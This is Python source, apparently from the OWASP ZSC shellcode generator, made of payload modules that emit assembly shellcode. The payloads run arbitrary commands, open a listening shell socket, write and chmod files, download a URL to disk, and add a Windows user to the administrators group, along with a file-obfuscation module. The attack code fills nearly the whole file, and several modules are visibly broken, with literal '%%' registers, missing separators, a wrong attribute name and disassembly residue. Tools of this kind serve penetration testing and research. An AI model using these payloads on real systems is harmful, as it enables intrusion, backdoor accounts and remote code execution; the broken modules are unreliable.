class Module(base_module.BasePayload):
    """Payload module: x86 assembly text (AT&T syntax) parameterised by ``command``.

    ``base_module``, ``stack`` and ``alert`` are module-level names brought in
    outside this listing; ``handle_generate`` is provided by ``BasePayload``
    (not visible here).
    """

    command = base_module.OptString("", "Command to execute")

    def generate(self):
        """Return the assembly source as one string, one instruction per line.

        ``stack.generate`` is not visible here; presumably it returns assembly
        text that leaves ``self.command`` on the stack, since the next
        instruction copies ``%esp`` — TODO confirm against ``stack``.
        """
        payload = "push $0xb\n"
        payload += "pop %eax\n"
        payload += "cltd\n"
        payload += "push %edx\n"
        payload += stack.generate(self.command, '%ecx', 'string')  # option text -> stack
        payload += "mov %esp, %esi\n"
        payload += "push %edx\n"
        payload += "push $0x632d9090\n"
        payload += "pop %ecx\n"
        payload += "shr $0x10, %ecx\n"
        payload += "push %ecx\n"
        payload += "mov %esp, %ecx\n"
        payload += "push %edx\n"
        payload += "push $0x68\n"
        payload += "push $0x7361622f\n"
        payload += "push $0x6e69622f\n"
        payload += "mov %esp, %ebx\n"
        payload += "push %edx\n"
        payload += "push %edi\n"
        payload += "push %esi\n"
        payload += "push %ecx\n"
        payload += "push %ebx\n"
        payload += "mov %esp, %ecx\n"
        payload += "int $0x80\n"
        return payload

    def run(self):
        """Report a missing ``command`` through ``alert.error``; otherwise delegate to ``handle_generate``."""
        if not self.command:
            alert.error("A command is required.")
            return
        self.handle_generate(__name__)
class Module(base_module.BasePayload):
    """Payload module: x86 assembly text (AT&T syntax) parameterised by a listen address and port.

    Options: ``lhost`` (IP), ``lport`` (port) and ``shell`` (defaults to
    ``/bin/sh``). ``stack``, ``alert`` and ``base_module`` are module-level
    names not visible in this listing.
    """

    lhost = base_module.OptIP("", "Listen IP address")
    lport = base_module.OptPort("", "Listen port")
    shell = base_module.OptString("/bin/sh", "Shell to execute")

    def generate(self):
        """Return the assembly source as one string, one instruction per line.

        ``lhost`` is embedded via ``stack.ipv4_to_hex`` and ``lport`` via
        ``hex()``; both helpers/values are used as-is, so this relies on
        ``OptIP``/``OptPort`` yielding a valid address string and an int —
        NOTE(review): the ``< 256`` comparison and ``hex()`` would raise on a
        string port; confirm what ``OptPort`` resolves to.
        """
        payload = "mov $1, %bl\n"
        payload += "push $0\n"
        payload += "push $1\n"
        payload += "push $2\n"
        payload += "mov %esp, %ecx\n"
        payload += "mov $0x66, %al\n"
        payload += "int $0x80\n"
        payload += f"push ${stack.ipv4_to_hex(self.lhost)}\n"  # PUSH IP
        # Register width for the port depends on whether it fits in one byte.
        if self.lport < 256:
            payload += f"mov ${hex(self.lport)}, %bl\n"  # MOV PORT
        else:
            payload += f"mov ${hex(self.lport)}, %bx\n"  # MOV PORT
        payload += "push %bx\n"
        payload += "mov $0x2, %bl\n"
        payload += "push %bx\n"
        payload += "mov %esp, %ebx\n"
        payload += "push $0x10\n"
        payload += "push %ebx\n"
        payload += "push %eax\n"
        payload += "mov %esp, %ecx\n"
        payload += "mov $0x3, %bl\n"
        payload += "push %eax\n"
        payload += "mov $0x66, %al\n"
        payload += "int $0x80\n"
        payload += "pop %ebx\n"
        payload += "mov $0x2, %cl\n"
        payload += "mov $0x3f, %al\n"
        payload += "int $0x80\n"
        payload += "dec %ecx\n"
        payload += "mov $0x3f, %al\n"
        payload += "int $0x80\n"
        payload += stack.generate(self.shell, '%ebx', 'string')  # shell path -> stack
        payload += "mov %esp, %ebx\n"
        payload += "xor %eax, %eax\n"
        payload += "push %eax\n"
        payload += "push %ebx\n"
        payload += "mov %esp, %ecx\n"
        payload += "xor %edx, %edx\n"
        payload += "mov $0xb, %al\n"
        payload += "int $0x80\n"
        return payload

    def run(self):
        """Require ``lhost`` and ``lport``, then delegate to ``handle_generate``.

        The two error messages are only the option names; they are runtime
        strings and are left unchanged here.
        """
        if not self.lhost:
            alert.error("Listen address")
            return
        if not self.lport:
            alert.error("Listen port")
            return
        self.handle_generate(__name__)
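class Module(base_module.BaseModule):
    """Obfuscate a file in place with a dynamically imported obfuscation module.

    Options:
        file: path of the file to transform; it is read and then overwritten.
        type: file type, used as the package segment ``<obfuscate pkg>.<type>``.

    ``run`` also reads ``self.method`` and ``self.times``, which are not declared
    on this class — NOTE(review): they must come from ``BaseModule`` or be
    injected by the framework; if not, the ``self.method`` check raises
    AttributeError before the ``try`` and is never reported via ``alert``.
    ``alert`` and ``traceback`` are module-level names not visible here.
    """

    file = base_module.OptString("", "File to obfuscate")
    type = base_module.OptString("", "File type")

    def run(self):
        """Load ``<pkg>.<type>.<method>``, obfuscate the file's content and write it back.

        Returns None. Failures are reported through ``alert.error`` and a
        printed traceback rather than raised. The module name is assembled from
        the ``type``/``method`` options; they are operator-supplied here, but if
        they ever come from an untrusted source they should be validated
        against the set of shipped obfuscators before being imported.
        """
        if not self.file:
            alert.error("File option is required")
            return
        if not self.method:
            alert.error("An obfuscation method is required")
            return
        from owasp_zsc.libs import obfuscate
        import importlib
        try:
            # Turn the on-disk location of the ``obfuscate`` package into its
            # dotted path relative to ``owasp_zsc`` (assumes a POSIX separator
            # and a single "owasp_zsc" segment in the path — TODO confirm).
            module_path = obfuscate.__path__[0].split("owasp_zsc")[1].replace(
                "/", ".")
            module = importlib.import_module(
                f"owasp_zsc{module_path}.{self.type}.{self.method}")
            obfuscator = getattr(module, "ObfuscateModule")()
            if hasattr(obfuscator, "times"):
                # FIX submodule doesn't take new times from options
                setattr(obfuscator, "times", self.times)
            alert.info("Getting file content")
            # ``with`` closes the handle even if read() raises (the original
            # left it to the garbage collector).
            with open(self.file) as f:
                content = f.read()
            if not content.strip():
                alert.error("File is empty!")
                return
            alert.info("Obfuscating file content")
            obfuscated_content = obfuscator.start(content)
            alert.info("Generating obfuscated script")
            # Overwrites the input in place; the handle is closed on every path.
            with open(self.file, "w") as f:
                f.write(obfuscated_content)
            alert.info("Completed. Your file is obfuscated.")
        except AttributeError:
            # Raised when the module lacks ``ObfuscateModule`` — but also by any
            # attribute error inside ``start()``, which is then misreported.
            traceback.print_exc()
            alert.error("Invalid module")
        except Exception:
            # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
            # still propagate; everything else is still printed, not swallowed.
            traceback.print_exc()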
class Module(base_module.BasePayload):
    """Payload module: x86 assembly text (AT&T syntax) that writes ``content`` to ``target_file``.

    ``stack``, ``alert`` and ``base_module`` are module-level names not visible
    in this listing; ``handle_generate`` comes from ``BasePayload``.
    """

    # FIXME 1: program crashes when full path of file is too long
    # FIXME 2: file contents is not contents only
    target_file = base_module.OptString("", "File to write data")
    content = base_module.OptString("", "File's data")

    def generate(self):
        """Return the assembly source as one string, one instruction per line.

        ``null`` is first the path length modulo 4 and then rebound to the
        string that is spliced into the payload — two unrelated meanings for
        one name; a second variable would read more clearly.
        ``len(self.content)`` counts characters, not encoded bytes — NOTE(review):
        these differ for non-ASCII content; confirm which one ``stack.generate``
        expects.
        """
        null = len(self.target_file) % 4
        if null != 0:
            null = ''
        else:
            # Only emitted when the path length is already a multiple of 4.
            null = 'xor %ebx, %ebx\npush %ebx\n'
        payload = "push $0x5\n"
        payload += "pop %eax\n"
        payload += null
        payload += stack.generate(str(self.target_file), '%ebx', 'string')  # path -> stack
        payload += "mov %esp, %ebx\n"
        payload += "push $0x4014141\n"
        payload += "pop %ecx\n"
        payload += "shr $0x10, %ecx\n"
        payload += "int $0x80\n"
        payload += "mov %eax, %ebx\n"
        payload += "push $0x4\n"
        payload += "pop %eax\n"
        payload += stack.generate(str(self.content), '%ecx', 'string')  # data -> stack
        payload += "mov %esp, %ecx\n"
        payload += stack.generate(str(len(self.content)), '%edx', 'int')  # data length
        payload += "int $0x80\n"
        payload += "mov $0x1, %al\n"
        payload += "mov $0x1, %bl\n"
        payload += "int $0x80\n"
        return payload

    def run(self):
        """Require both options, then delegate to ``handle_generate``."""
        if not self.target_file:
            alert.error("Target file is required")
            return
        if not self.content:
            alert.error("File's content is required")
            return
        self.handle_generate(__name__)
class Module(base_module.BasePayload): perm = base_module.OptString("", "Permission mask") # TODO improve descr file_dest = base_module.OptString("", "File Target") # TODO improve descr def generate(self): payload = "xor %%eax, %%eax" payload += "push %%eax" payload += stack.generate(self.file_dest, '%ebx', 'string') payload += "mov %%esp, %%edx" payload += stack.generate(self.perm, '%ecx', 'int') payload += "push %%edx" payload += "push $0xf" payload += "pop %%eax" payload += "push $0x2a" payload += "int $0x80" payload += "mov $0x01, %%al" payload += "mov $0x01, %%bl" payload += "int $0x80" return payload def run(self): print(self.generate())
class Module(base_module.BasePayload):
    """Payload module: x86 assembly text (AT&T syntax) built from a file path and a permission mask.

    ``stack``, ``alert`` and ``base_module`` are module-level names not visible
    in this listing; ``handle_generate`` comes from ``BasePayload``.
    """

    target_file = base_module.OptString("", "Target file to change permission")
    permission = base_module.OptString("", "Permission mask (number)")

    def generate(self):
        """Return the assembly source as one string, one instruction per line."""
        payload = "push $0x0f\n"
        payload += "pop %eax\n"
        payload += stack.generate(self.permission, '%ecx', 'int')  # OptString passed as 'int'
        payload += stack.generate(self.target_file, '%ebx', 'string')  # path -> stack
        payload += "mov %esp, %ebx\n"
        payload += "int $0x80\n"
        payload += "mov $0x01, %al\n"
        payload += "mov $0x01, %bl\n"
        payload += "int $0x80\n"
        return payload

    def run(self):
        """Require both options, then delegate to ``handle_generate``.

        The first message mentions permissions although only ``target_file``
        is missing at that point; it is a runtime string and is left as-is.
        """
        if not self.target_file:
            alert.error("Target file and file's permissions are required")
            return
        if not self.permission:
            alert.error("Target's permission is required")
            return
        self.handle_generate(__name__)
class Module(base_module.BasePayload):
    """Payload module: x86 assembly text built from ``file_dest``.

    NOTE(review): as in one other module of this file, instructions are joined
    without ``\\n`` and registers are written ``%%eax`` although no
    %-formatting is applied, so the text is emitted literally in that form.
    There is also no ``run`` method, so the option is never validated and the
    framework entry point used by sibling modules is missing — confirm whether
    ``BasePayload`` supplies one.
    """

    file_dest = base_module.OptString("", "Destination file")

    def generate(self):
        """Return the concatenated assembly text (see the class note on separators)."""
        payload = stack.generate(self.file_dest, '%ebx', 'string')  # path -> stack
        payload += "mov %%esp, %%ebx"
        payload += "xor %%eax, %%eax"
        payload += "push %%eax"
        payload += "mov %%esp, %%edx"
        payload += "push %%ebx"
        payload += "mov %%esp, %%ecx"
        payload += "push %%edx"
        payload += "push %%ecx"
        payload += "push %%ebx"
        payload += "mov $0x3b, %%al"
        payload += "push $0x2a"
        payload += "int $0x80"
        payload += "mov $0x1, %%al"
        payload += "mov $0x1, %%bl"
        payload += "int $0x80"
        return payload
class Module(base_module.BasePayload):
    """Payload module: x86 assembly text (AT&T syntax) built from ``target_file``.

    ``stack``, ``alert`` and ``base_module`` are module-level names not visible
    in this listing; ``handle_generate`` comes from ``BasePayload``.
    """

    target_file = base_module.OptString("", "Target file to execute file")

    def generate(self):
        """Return the assembly source as one string, one instruction per line.

        The final instruction has no trailing ``\\n`` while every other line
        does — harmless if the consumer appends its own newline, otherwise
        inconsistent with the sibling modules.
        """
        payload = "mov $0x46, %al\n"
        payload += "xor %ebx, %ebx\n"
        payload += "xor %ecx, %ecx\n"
        payload += "int $0x80\n"
        payload += stack.generate(self.target_file, '%ebx', 'string')  # path -> stack
        payload += "mov %esp, %ebx\n"
        payload += "xor %eax, %eax\n"
        payload += "mov $0xb, %al\n"
        payload += "int $0x80\n"
        payload += "mov $0x1, %al\n"
        payload += "mov $0x1, %bl\n"
        payload += "int $0x80"
        return payload

    def run(self):
        """Require ``target_file``, then delegate to ``handle_generate``."""
        if not self.target_file:
            alert.error("Target file is required")
            return
        self.handle_generate(__name__)
class Module(base_module.BasePayload):
    """Payload module: x86 assembly text (AT&T syntax) around a ``net user`` command line.

    ``generate`` takes the already-converted command text and a stack
    adjustment; ``run`` computes both from ``username``/``password``.
    NOTE(review): instructions are joined without ``\\n`` here, unlike most
    sibling modules — confirm the consumer tolerates that. ``stack``,
    ``base_module`` and ``ceil`` are module-level names not visible in this
    listing (``ceil`` is presumably ``math.ceil``).
    """

    username = base_module.OptString("", "Username")
    password = base_module.OptString("", "Password")

    def generate(self, command, cvtcommand):
        """Return the concatenated assembly text.

        Args:
            command: assembly text (from ``stack.generate``) that places the
                command string on the stack; spliced in verbatim.
            cvtcommand: hex string for the ``add $..., %esp`` that unwinds it.
        """
        # Everything up to "add %ebx, %edx" is repeated verbatim in several
        # sibling modules of this file; a shared helper would remove the copy.
        payload = "xor %ecx, %ecx"
        payload += "mov %fs:0x30(%ecx), %eax"
        payload += "mov 0xc(%eax), %eax"
        payload += "mov 0x14(%eax), %esi"
        payload += "lods %ds:(%esi), %eax"
        payload += "xchg %eax, %esi"
        payload += "lods %ds:(%esi), %eax"
        payload += "mov 0x10(%eax), %ebx"
        payload += "mov 0x3c(%ebx), %edx"
        payload += "add %ebx, %edx"
        payload += "mov 0x78(%edx), %edx"
        payload += "add %ebx, %edx"
        payload += "mov 0x20(%edx), %esi"
        payload += "add %ebx, %esi"
        payload += "xor %ecx, %ecx"
        payload += "inc %ecx"
        payload += "lods %ds:(%esi), %eax"
        payload += "add %ebx, %eax"
        payload += "cmpl $0x50746547, (%eax)"
        payload += "jne 23 <.text+0x23>"
        payload += "cmpl $0x41636f72, 0x4(%eax)"
        payload += "jne 23 <.text+0x23>"
        payload += "cmpl $0x65726464, 0x8(%eax)"
        payload += "jne 23 <.text+0x23>"
        payload += "mov 0x24(%edx), %esi"
        payload += "add %ebx, %esi"
        payload += "mov (%esi, %ecx, 2), %cx"
        payload += "dec %ecx"
        payload += "mov 0x1c(%edx), %esi"
        payload += "add %ebx, %esi"
        payload += "mov (%esi, %ecx, 4), %edx"
        payload += "add %ebx, %edx"
        payload += "push %ebx"
        payload += "push %edx"
        payload += "xor %ecx, %ecx"
        payload += "push %ecx"
        payload += "mov $0x61636578, %ecx"
        payload += "push %ecx"
        payload += "subl $0x61, 0x3(%esp)"
        payload += "push $0x456e6957"
        payload += "push %esp"
        payload += "push %ebx"
        payload += "call *%edx"
        payload += "add $0x8, %esp"
        payload += "pop %ecx"
        payload += "push %eax"
        payload += "xor %ecx, %ecx"
        payload += "push %ecx"
        payload += command  # caller-supplied: command string -> stack
        payload += "xor %ebx, %ebx"
        payload += "mov %esp, %ebx"
        payload += "xor %ecx, %ecx"
        payload += "inc %ecx"
        payload += "push %ecx"
        payload += "push %ebx"
        payload += "call *%eax"
        payload += f"add ${cvtcommand}, %esp"  # unwind the pushed command
        payload += "pop %edx"
        payload += "pop %ebx"
        payload += "xor %ecx, %ecx"
        payload += "mov $0x61737365, %ecx"
        payload += "push %ecx"
        payload += "subl $0x61, 0x3(%esp)"
        payload += "push $0x636f7250"
        payload += "push $0x74697845"
        payload += "push %esp"
        payload += "push %ebx"
        payload += "call *%edx"
        payload += "xor %ecx, %ecx"
        payload += "push %ecx"
        payload += "call *%eax"
        return payload

    def run(self):
        """Build the command line from the options and print the generated text.

        Neither option is validated before use, and the result is printed
        rather than passed to ``handle_generate`` as sibling modules do. The
        stack adjustment is ``8 + 4 * ceil(len(command) / 4)`` as a hex string.
        """
        command = f"cmd.exe /c net user {self.username} {self.password} /add && " \
                  f"net localgroup administrators {self.username} /add "
        print(
            self.generate(stack.generate(command, "%ecx", "string"),
                          hex(int(8 + 4 * (ceil(len(command) / float(4)))))))
class Module(base_module.BasePayload):
    """Payload module: x86 assembly text (AT&T syntax) built from ``target_file``.

    ``stack``, ``alert``, ``base_module`` and ``ceil`` are module-level names
    not visible in this listing (``ceil`` is presumably ``math.ceil``);
    ``handle_generate`` comes from ``BasePayload``.
    """

    target_file = base_module.OptString("", "Target file to execute")

    def generate(self):
        """Return the assembly source as one string, one instruction per line.

        The ``add $..., %esp`` after the call unwinds the pushed path using
        ``8 + 4 * ceil(len(target_file) / 4)`` bytes, i.e. the character
        count rounded up to a multiple of 4 plus 8.
        """
        # Everything up to "add %ebx, %edx\n" is repeated verbatim in several
        # sibling modules of this file; a shared helper would remove the copy.
        payload = "xor %ecx, %ecx\n"
        payload += "mov %fs:0x30(%ecx), %eax\n"
        payload += "mov 0xc(%eax), %eax\n"
        payload += "mov 0x14(%eax), %esi\n"
        payload += "lods %ds:(%esi), %eax\n"
        payload += "xchg %eax, %esi\n"
        payload += "lods %ds:(%esi), %eax\n"
        payload += "mov 0x10(%eax), %ebx\n"
        payload += "mov 0x3c(%ebx), %edx\n"
        payload += "add %ebx, %edx\n"
        payload += "mov 0x78(%edx), %edx\n"
        payload += "add %ebx, %edx\n"
        payload += "mov 0x20(%edx), %esi\n"
        payload += "add %ebx, %esi\n"
        payload += "xor %ecx, %ecx\n"
        payload += "inc %ecx\n"
        payload += "lods %ds:(%esi), %eax\n"
        payload += "add %ebx, %eax\n"
        payload += "cmpl $0x50746547, (%eax)\n"
        payload += "jne 23 <.text+0x23>\n"
        payload += "cmpl $0x41636f72, 0x4(%eax)\n"
        payload += "jne 23 <.text+0x23>\n"
        payload += "cmpl $0x65726464, 0x8(%eax)\n"
        payload += "jne 23 <.text+0x23>\n"
        payload += "mov 0x24(%edx), %esi\n"
        payload += "add %ebx, %esi\n"
        payload += "mov (%esi, %ecx, 2), %cx\n"
        payload += "dec %ecx\n"
        payload += "mov 0x1c(%edx), %esi\n"
        payload += "add %ebx, %esi\n"
        payload += "mov (%esi, %ecx, 4), %edx\n"
        payload += "add %ebx, %edx\n"
        payload += "push %ebx\n"
        payload += "push %edx\n"
        payload += "xor %ecx, %ecx\n"
        payload += "push %ecx\n"
        payload += "mov $0x61636578, %ecx\n"
        payload += "push %ecx\n"
        payload += "subl $0x61, 0x3(%esp)\n"
        payload += "push $0x456e6957\n"
        payload += "push %esp\n"
        payload += "push %ebx\n"
        payload += "call *%edx\n"
        payload += "add $0x8, %esp\n"
        payload += "pop %ecx\n"
        payload += "push %eax\n"
        payload += "xor %ecx, %ecx\n"
        payload += "push %ecx\n"
        payload += stack.generate(self.target_file, "%ecx", "string")  # path -> stack
        payload += "xor %ebx, %ebx\n"
        payload += "mov %esp, %ebx\n"
        payload += "xor %ecx, %ecx\n"
        payload += "inc %ecx\n"
        payload += "push %ecx\n"
        payload += "push %ebx\n"
        payload += "call *%eax\n"
        # Unwind the pushed path (character count, not byte count, is used).
        payload += f"add ${hex(int(8 + 4 * (ceil(len(self.target_file) / float(4)))))}, %esp\n"
        payload += "pop %edx\n"
        payload += "pop %ebx\n"
        payload += "xor %ecx, %ecx\n"
        payload += "mov $0x61737365, %ecx\n"
        payload += "push %ecx\n"
        payload += "subl $0x61, 0x3(%esp)\n"
        payload += "push $0x636f7250\n"
        payload += "push $0x74697845\n"
        payload += "push %esp\n"
        payload += "push %ebx\n"
        payload += "call *%edx\n"
        payload += "xor %ecx, %ecx\n"
        payload += "push %ecx\n"
        payload += "call *%eax\n"
        return payload

    def run(self):
        """Require ``target_file``, then delegate to ``handle_generate``.

        NOTE(review): the error text mentions permissions although this module
        has no permission option (runtime string, left unchanged). The bare
        ``except:`` also swallows KeyboardInterrupt/SystemExit, and
        ``traceback`` is imported inside the ``try`` — if that import itself
        failed, the handler would raise NameError. ``except Exception:`` with
        the import hoisted would be the usual shape.
        """
        if not self.target_file:
            alert.error("Target file and file's permissions are required")
            return
        try:
            import traceback
            self.handle_generate(__name__)
        except:
            traceback.print_exc()
class Module(base_module.BasePayload): file_dest = base_module.OptString("", "File dest") # TODO improve descr def generate(self): payload = "sub $0x20, %rsp" payload += "and $0xfffffffffffffff0, %rsp" payload += "mov %gs:0x60, %r12" payload += "mov 0x18(%r12), %r12" payload += "mov 0x20(%r12), %r12" payload += "mov (%r12), %r12" payload += "mov 0x20(%r12), %r15" payload += "mov (%r12), %r12" payload += "mov 0x20(%r12), %r12" payload += "mov $0xe8afe98, %rdx" payload += "mov %r12, %rcx" payload += "mov %r12, %r12" payload += "callq 0x401067" payload += "jmp 0x401059" payload += "pop %rcx" payload += "mov $0x1, %edx" payload += "callq *%rax" payload += "mov $0x2d3fcd70, %edx" payload += "mov %r15, %rcx" payload += "callq 0x401067" payload += "xor %rcx, %rcx" payload += "callq *%rax" payload += "callq 0x40103f" payload += "movslq 0x6c(%rcx), %esp" payload += "movslq (%rsi), %ebp" payload += "gs js 0x4010cb" payload += "add %cl, -0x77(%rcx)" payload += "int $0x67" payload += "mov 0x3c(%r13), %eax" payload += "mov 0x88(%r13d, %eax, 1), %r14d" payload += "add %r13d, %r14d" payload += "mov 0x18(%r14d), %r10d" payload += "mov 0x20(%r14d), %ebx" payload += "add %r13d, %ebx" payload += "jecxz 0x4010ca" payload += "dec %r10d" payload += "mov (%ebx, %r10d, 4), %esi" payload += "add %r13d, %esi" payload += "xor %edi, %edi" payload += "xor %eax, %eax" payload += "cld" payload += "lodsb %ds:(%rsi), %al" payload += "test %al, %al" payload += "je 0x4010a7" payload += "ror $0xd, %edi" payload += "add %eax, %edi" payload += "jmp 0x40109b" payload += "cmp %edx, %edi" payload += "jne 0x401088" payload += "mov 0x24(%r14d), %ebx" payload += "add %r13d, %ebx" payload += "xor %ecx, %ecx" payload += "mov (%ebx, %r10d, 2), %cx" payload += "mov 0x1c(%r14d), %ebx" payload += "add %r13d, %ebx" payload += "mov (%ebx, %ecx, 4), %eax" payload += "add %r13d, %eax" payload += "retq" payload += "add %al, (%rax)" payload += "add %al, (%rax)" return payload def run(self): print(self.generate())
class Module(base_module.BasePayload):
    """Payload module: x86 assembly text (AT&T syntax) built from a URL and a file name.

    NOTE(review): ``generate`` reads ``self.filename``, but the declared option
    is ``file_dest`` — unless ``BasePayload`` aliases it, this raises
    AttributeError on every run. Instructions are also joined without ``\\n``,
    unlike most sibling modules. ``stack`` and ``base_module`` are module-level
    names not visible here.
    """

    url = base_module.OptString("", "URL to download")  # TODO improve descr
    file_dest = base_module.OptString("", "File name")  # TODO improve descr

    def generate(self):
        """Return the concatenated assembly text (see the class note)."""
        # Everything up to "add %ebx, %edx" is repeated verbatim in several
        # sibling modules of this file; a shared helper would remove the copy.
        payload = "xor %ecx, %ecx"
        payload += "mov %fs:0x30(%ecx), %eax"
        payload += "mov 0xc(%eax), %eax"
        payload += "mov 0x14(%eax), %esi"
        payload += "lods %ds:(%esi), %eax"
        payload += "xchg %eax, %esi"
        payload += "lods %ds:(%esi), %eax"
        payload += "mov 0x10(%eax), %ebx"
        payload += "mov 0x3c(%ebx), %edx"
        payload += "add %ebx, %edx"
        payload += "mov 0x78(%edx), %edx"
        payload += "add %ebx, %edx"
        payload += "mov 0x20(%edx), %esi"
        payload += "add %ebx, %esi"
        payload += "xor %ecx, %ecx"
        payload += "inc %ecx"
        payload += "lods %ds:(%esi), %eax"
        payload += "add %ebx, %eax"
        payload += "cmpl $0x50746547, (%eax)"
        payload += "jne 23 <.text+0x23>"
        payload += "cmpl $0x41636f72, 0x4(%eax)"
        payload += "jne 23 <.text+0x23>"
        payload += "cmpl $0x65726464, 0x8(%eax)"
        payload += "jne 23 <.text+0x23>"
        payload += "mov 0x24(%edx), %esi"
        payload += "add %ebx, %esi"
        payload += "mov (%esi, %ecx, 2), %cx"
        payload += "dec %ecx"
        payload += "mov 0x1c(%edx), %esi"
        payload += "add %ebx, %esi"
        payload += "mov (%esi, %ecx, 4), %edx"
        payload += "add %ebx, %edx"
        payload += "xor %esi, %esi"
        payload += "mov %edx, %esi"
        payload += "xor %ecx, %ecx"
        payload += "push %ecx"
        payload += "push $0x41797261"
        payload += "push $0x7262694c"
        payload += "push $0x64616f4c"
        payload += "push %esp"
        payload += "push %ebx"
        payload += "call *%edx"
        payload += "xor %ecx, %ecx"
        payload += "mov $0x6c6c, %cx"
        payload += "push %ecx"
        payload += "push $0x642e6e6f"
        payload += "push $0x6d6c7275"
        payload += "push %esp"
        payload += "call *%eax"
        payload += "xor %ecx, %ecx"
        payload += "push %ecx"
        payload += "mov $0x4165, %cx"
        payload += "push %ecx"
        payload += "push $0x6c69466f"
        payload += "push $0x5464616f"
        payload += "push $0x6c6e776f"
        payload += "push $0x444c5255"
        payload += "mov %esp, %ecx"
        payload += "push %ecx"
        payload += "push %eax"
        payload += "call *%esi"
        payload += "xor %ecx, %ecx"
        payload += "push %ecx"
        payload += stack.generate(self.url, "%ecx", "string")  # url -> stack
        payload += "xor %edi, %edi"
        payload += "mov %esp, %edi"
        payload += "xor %ecx, %ecx"
        payload += "push %ecx"
        payload += stack.generate(self.filename, "%ecx", "string")  # NOTE(review): option is ``file_dest``
        payload += "xor %edx, %edx"
        payload += "mov %esp, %edx"
        payload += "xor %ecx, %ecx"
        payload += "push %ecx"
        payload += "push %ecx"
        payload += "push %edx"
        payload += "push %edi"
        payload += "push %ecx"
        payload += "call *%eax"
        payload += "xor %ecx, %ecx"
        payload += "push %ecx"
        payload += "push $0x73736590"
        payload += "pop %ecx"
        payload += "shr $0x8, %ecx"
        payload += "push %ecx"
        payload += "push $0x636f7250"
        payload += "push $0x74697845"
        payload += "push %esp"
        payload += "push %ebx"
        payload += "call *%esi"
        payload += "xor %ecx, %ecx"
        payload += "push %ecx"
        payload += "call *%eax"
        return payload

    def run(self):
        """Print the generated text; no validation and no ``handle_generate`` call, unlike sibling modules."""
        print(self.generate())
class Module(base_module.BasePayload):
    """Payload module: x86 assembly text (AT&T syntax) around an ``echo ... > file`` command.

    ``generate`` takes the converted command text; ``run`` builds it from
    ``data`` and ``file_dest``. NOTE(review): instructions are joined without
    ``\\n`` here, unlike most sibling modules. ``stack`` and ``base_module``
    are module-level names not visible in this listing.
    """

    file_dest = base_module.OptString("", "File Destination")
    data = base_module.OptString("", "File data")

    def generate(self, command):
        """Return the concatenated assembly text.

        Args:
            command: assembly text (from ``stack.generate``) that places the
                command string on the stack; spliced in verbatim.
        """
        # Everything up to "add %ebx, %edx" is repeated verbatim in several
        # sibling modules of this file; a shared helper would remove the copy.
        payload = "xor %ecx, %ecx"
        payload += "mov %fs:0x30(%ecx), %eax"
        payload += "mov 0xc(%eax), %eax"
        payload += "mov 0x14(%eax), %esi"
        payload += "lods %ds:(%esi), %eax"
        payload += "xchg %eax, %esi"
        payload += "lods %ds:(%esi), %eax"
        payload += "mov 0x10(%eax), %ebx"
        payload += "mov 0x3c(%ebx), %edx"
        payload += "add %ebx, %edx"
        payload += "mov 0x78(%edx), %edx"
        payload += "add %ebx, %edx"
        payload += "mov 0x20(%edx), %esi"
        payload += "add %ebx, %esi"
        payload += "xor %ecx, %ecx"
        payload += "inc %ecx"
        payload += "lods %ds:(%esi), %eax"
        payload += "add %ebx, %eax"
        payload += "cmpl $0x50746547, (%eax)"
        payload += "jne 23 <.text+0x23>"
        payload += "cmpl $0x41636f72, 0x4(%eax)"
        payload += "jne 23 <.text+0x23>"
        payload += "cmpl $0x65726464, 0x8(%eax)"
        payload += "jne 23 <.text+0x23>"
        payload += "mov 0x24(%edx), %esi"
        payload += "add %ebx, %esi"
        payload += "mov (%esi, %ecx, 2), %cx"
        payload += "dec %ecx"
        payload += "mov 0x1c(%edx), %esi"
        payload += "add %ebx, %esi"
        payload += "mov (%esi, %ecx, 4), %edx"
        payload += "add %ebx, %edx"
        payload += "xor %esi, %esi"
        payload += "mov %edx, %esi"
        payload += "xor %ecx, %ecx"
        payload += "push %ecx"
        payload += "push $0x41797261"
        payload += "push $0x7262694c"
        payload += "push $0x64616f4c"
        payload += "push %esp"
        payload += "push %ebx"
        payload += "call *%edx"
        payload += "xor %ecx, %ecx"
        payload += "mov $0x6c6c, %cx"
        payload += "push %ecx"
        payload += "push $0x642e7472"
        payload += "push $0x6376736d"
        payload += "push %esp"
        payload += "call *%eax"
        payload += "xor %edi, %edi"
        payload += "mov %eax, %edi"
        payload += "xor %edx, %edx"
        payload += "push %edx"
        payload += "mov $0x6d65, %dx"
        payload += "push %edx"
        payload += "push $0x74737973"
        payload += "mov %esp, %ecx"
        payload += "push %ecx"
        payload += "push %edi"
        payload += "xor %edx, %edx"
        payload += "mov %esi, %edx"
        payload += "call *%edx"
        payload += "xor %ecx, %ecx"
        payload += command  # caller-supplied: command string -> stack
        payload += "push %esp"
        payload += "call *%eax"
        payload += "xor %edx, %edx"
        payload += "push %edx"
        payload += "push $0x74697865"
        payload += "mov %esp, %ecx"
        payload += "push %ecx"
        payload += "push %edi"
        payload += "call *%esi"
        payload += "xor %ecx, %ecx"
        payload += "push %ecx"
        payload += "call *%eax"
        return payload

    def run(self):
        """Build the command from the options and print the generated text.

        Neither option is validated, and the result is printed rather than
        passed to ``handle_generate`` as sibling modules do.
        """
        command = stack.generate(f"echo {self.data} > {self.file_dest}", "%ecx", "string")
        print(self.generate(command))
class Module(base_module.BasePayload):
    """Payload module: x86-64 assembly in Intel/NASM syntax (``bits 64``, labels, ``db``).

    This is the only module in this file that emits Intel syntax; the ``;``
    comments are part of the emitted text, not Python comments, and the
    lines are joined without ``\\n``. NOTE(review): ``run`` passes the
    result of ``stack.generate(..., "%ecx", "string")`` — which sibling
    modules splice in as AT&T instruction text — into a ``db`` directive;
    verify that ``stack.generate`` produces something ``db`` accepts.
    ``stack`` and ``base_module`` are module-level names not visible here.
    """

    dest_file = base_module.OptString("notepad.exe", "File to execute")

    def generate(self, dest):
        """Return the concatenated NASM text with ``dest`` placed after ``db``.

        Args:
            dest: text inserted verbatim into the ``db`` line (see class note).
        """
        payload = "bits 64"
        payload += "section .text"
        payload += "global start"
        payload += ""
        payload += "start:"
        payload += ";get dll base addresses"
        payload += " sub rsp, 20h ;reserve stack space for called functions"
        payload += " and rsp, 0fffffffffffffff0h ;make sure stack 16-byte aligned "
        payload += " "
        payload += " mov r12, [gs:60h] ;peb"
        payload += " mov r12, [r12 + 0x18] ;Peb --> LDR"
        payload += " mov r12, [r12 + 0x20] ;Peb.Ldr.InMemoryOrderModuleList"
        payload += " mov r12, [r12] ;2st entry"
        payload += " mov r15, [r12 + 0x20] ;ntdll.dll base address!"
